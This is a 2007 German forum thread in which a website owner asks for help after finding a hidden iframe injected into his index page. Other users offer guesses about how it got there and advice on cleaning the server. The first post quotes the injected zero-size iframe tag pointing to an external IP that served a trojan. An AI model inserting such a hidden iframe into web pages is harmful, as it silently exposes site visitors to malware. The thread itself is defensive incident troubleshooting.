Trojaner per iframe. Hacker hat Zugriff auf datenbank?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von naitsgang, 23. Juni 2007 .

  1. 23. Juni 2007
    Hey,
    Ich habe soeben einen Trojaner auf meiner Website entdeckt. Ich hab die index schon gesäubert, aber ich habe den Verdacht dass er Zugriff auf die DB hat. Man kann nämlich in unserem ACP die index über die Datenbank ändern. hier mal n Auszug aus dem public-quelltext:

    Code:
    Wir sind zurück! Weil der alte Server n bisschen gezickt hat hat es ein bisschen länger gedauert als geplant... Zum Glück hat uns exec mit dem wir das Board leiten ein bisschen Space zur verfügung gestellt. Domain gleich inklusive.Jetzt kann es wie gewohnt mit guten Upps und guter Launer weitergehen. Ein neuer Header ist schon in Planung und wir hoffen ihr habt spass hier :)<br></br>
    
    MFG Enforcer&Naitsgang
    </div></div>
    
    <div class="spacer"></div>
     [B][COLOR="Red"]<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>[/COLOR][/B] </td>
     <td id="right">
     <div align="right">
     <div class="box">
     <div class="box_a">
     </div>
    
    
    Wie man am fettgedruckten sehen kann wird der Code ausgeführt ohne ihn zu sehen.
    Kann es sein dass er den phpmyadmin gehackt hat und dann das Teil da gepostet hat??? Jede antwort ne BW!


    MFG naitsgang
     
  2. 23. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Um genauer zu sein Kaspersky meldet den Trojaner: JS.Agent.ep und der Code den naitsgang gepostet hat war/is 2 mal in der index.php drin!!
    Die Seite wird also im iframe geladen das man es gar nicht merkt nur halt dadruch das der Av ansprigt und die Seite blockt!

    Beim Whois des Servers mit dem Trojaner kam heraus:

    IP Location: Panama Panama Rbusiness Network
    Blacklist Status: Currently Listed

    Code:
    Whois Record
    
    inetnum: 81.95.144.0 - 81.95.147.255
    netname: RBNET
    descr: RBusiness Network
    admin-c: RNR4-RIPE
    tech-c: RNR4-RIPE
    mnt-by: RBN-MNT
    status: ASSIGNED PA
    country: PA
    remarks: INFRA-AW
    source: RIPE # Filtered
    
    role: RBusiness Network Registry
    address: RBusiness Network
    address: The Century Tower Building
    address: Ricardo J. Alfari Avenue
    address: Panama City
    address: Republic of Panama
    phone: +1 401 369 8152
    remarks: Points of contact for RBusiness Network Operations
    remarks: ------------------------------------------------------
    remarks: Routing and peering issues: Whois Privacy and Spam Prevention by DomainTools.com
    remarks: SPAM and Network security issues: Whois Privacy and Spam Prevention by DomainTools.com
    remarks: Customer support: Whois Privacy and Spam Prevention by DomainTools.com
    remarks: General information: Whois Privacy and Spam Prevention by DomainTools.com
    remarks: ------------------------------------------------------
    e-mail: Whois Privacy and Spam Prevention by DomainTools.com
    admin-c: JK4668-RIPE
    tech-c: JI424-RIPE
    nic-hdl: RNR4-RIPE
    mnt-by: RBN-MNT
    source: RIPE # Filtered
    
    route: 81.95.144.0/22
    descr: RBNetwork
    origin: AS40989
    mnt-by: RBN-MNT
    source: RIPE # Filtered
    
    So jetzt können mal die wo Ahnung haben uns helfen^^!
     
  3. 23. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Meinste das hat was damit zu tun??? Und wie krieg ich das von der Site runter??? Wenns nur ich wäre dann wärs mir ladde aber so werden auch die User gefährdet... Wie is das da eig. drauf gekommen???
    MFG naitsgang
     
  4. 23. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Wie sollen wir euch sagen, wie jemand Fremdcode auf eurer Seite einschleust?
    Wie sollen wir euch sagen, wie ihr den Fremdcode von eurer Seite entfernt?

    Es freut mich uebrigens, dass du gelernt hast, ganze Saetze zu schreiben.
     
  5. 23. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    hm denke mal das ding ist so draufgekommen:
    er hat deinen verschlüsselten hash geknackt (mit nem prog) und sich dann zutritt zum acp verschafft....
    dann hat er das ding vieleicht durch nen exploit reingekriegt....
    so würd ich es mir vorstellen....
    (kann aber auch völlig falsch liegen)
     
  6. 23. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Wie will der an meinen Hash kommen??? Der Code is non-public und selbstgecodet.
    @dude: Ich hab nur darauf gewartet dass du nen Post von mir liest wo ich mal normal schreibe und nicht alle 4 Wörter unterbreche ^^

    Aber das mit dem Hash wird ja nicht so leicht gehen, weil der ja auch nicht public ist. Deswegen gibts ja auch z.b. Wbb exploits oder??

    MFG naitsgang
     
  7. 23. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Schwachsinn. Was fuer ein cmd?
    Nicht zufaellig Start -> Ausfuehren -> cmd? Wie willst du damit an einen Hash kommen. Normalerweise fuehrst du damit ein Exploit aus, weil man ueber den Cmd direkt die Parameter mit angeben kann aber der Cmd selbst macht nichts...
    Weiterhin ist das Script selbst gecodet und bei einem selbstgecodeten Closed-Source Projekt ein Exploit zu finden ist ziemlich schwer und wuerde sich nur fuer einen Trojaner nicht lohnen.
    Also gilt weiterhin: erst informieren, dann reden.
     
  8. 24. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    es gibt zwei möglichkeiten:
    a) euer hacker hat zugang zur datenbank und ihr speichert alle html sachen da drinnen
    b) euer hacker hat zugang zum server und editiert da die phpfiles

    ursachen:
    du, oder ein anderer mit zugang zum server haben sich vom hacker einen trojaner eingefangen

    beheben des probs:
    trojaner löschen und server/pma-passwort ändern
     
  9. 24. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Es ist natürlich schwierig die ganze Sache zu beurteielen, da ich weder eure Seite kenne noch euen Code...
    Aber gibt es irgendwo Formulare/andere Eingabemöglichkeiten wo die User Daten angeben können, die später in die Datenbank wandern? (Es würde auch dazu zählen wenn das Script zum Beispiel eine Zahl ausrechnet die dann per GET oder POST übergeben wird und später in die DB geschrieben wird...)

    Wenn ja, wie werden diese Daten vor der Eingabe überprüft? Wenn die Eingabeprüfung nur einen kleinen Mangel aufweißt ist es für geübte Programmierer ein leichtes eine SQL-Injection zu implizieren.

    Folgen: Verändern der Daten in der DB / Datenbankübernahme / Serverübernahme
    Lösung: Komplette Seite sofort offline nehmen. Alle Kennwörter ändern. Kompletten Server und komplette DB auf Backdoors durchkämmen. Code überarbeiten und jede Usereingabe sauber maskieren.

    Siehe dazu auch: SQL-Injektion in der Wikipedia
     
  10. 24. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Weil unsere Site von Useruploads lebt ist es dann wahrscheinlich dass das durch die upp.php verursacht wurde. Wer mal schauen will kann die Datei per PN bekommen. Wie schaff ichs dann dass das ding draußen ist??? alles auf die Platte laden und durchsuchen?

    MFG naitsgang

    //edit: wird alles escaped.
     
  11. 24. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Sers,

    also am besten Serverkomplett säubern. Backup mit vorsicht behandeln er könnte eine shell drauf haben, die du dann mitkopierst und dann war die arbeit umsonst.

    mfg

    rushzero
     
  12. 24. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Bist du mal über deine Seite mit nem Security Scanner drüber gegangen?

    Kann ja sein das die Seite ganz einfache Fehler beinhaltet.

    Acunetix würde mir da jetzt spontan einfallen.
     
  13. 24. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Mal ein interessantes Update. Ich hatte das Script noch nebenbei auf einem anderen Non-Public-Server laufen. Da hat sich das Script auch infiziert. Die auffälligkeiten sind dass ich dort die selbe shoutbox benutzt habe und den selben counter und die shoutboxen sind auf beiden Seiten plötzlich weg. Hat sich der Shoutbox-Betreiber etwa infiziert??

    MFG naitsgang
     
  14. 24. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    könnte ja normalerweise nicht. Da sich die Infektion ja nicht remote auf dich übertragen kann.

    Es sei den der Betreiber hat Source (.php dateien) angeboten die du auf deinem Server hattest und da is dann ein Exploit drin.

    Denn wenn du nur per include die Datei einbindest sollte es eigentlich nicht gehen.
     
  15. 25. Juni 2007
    AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank?

    Also das ganze läuft so ab:
    Du bindest da den Shoutboxcode via iframe auf deine Seite ein und dann kannste die shoubox benutzen. Aber ich glaube dass vllt was mit dem Shoutbox-anbieter nicht stimmt, weil bei beiden seiten (auch auf dem unbekannten space) die gleiche shoutbox verwendet wurde, die aus dem Code entfernt war und der "schadcode" drin war. Kann das was damit zu tun haben??

    MFG naitsgang
     
  16. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.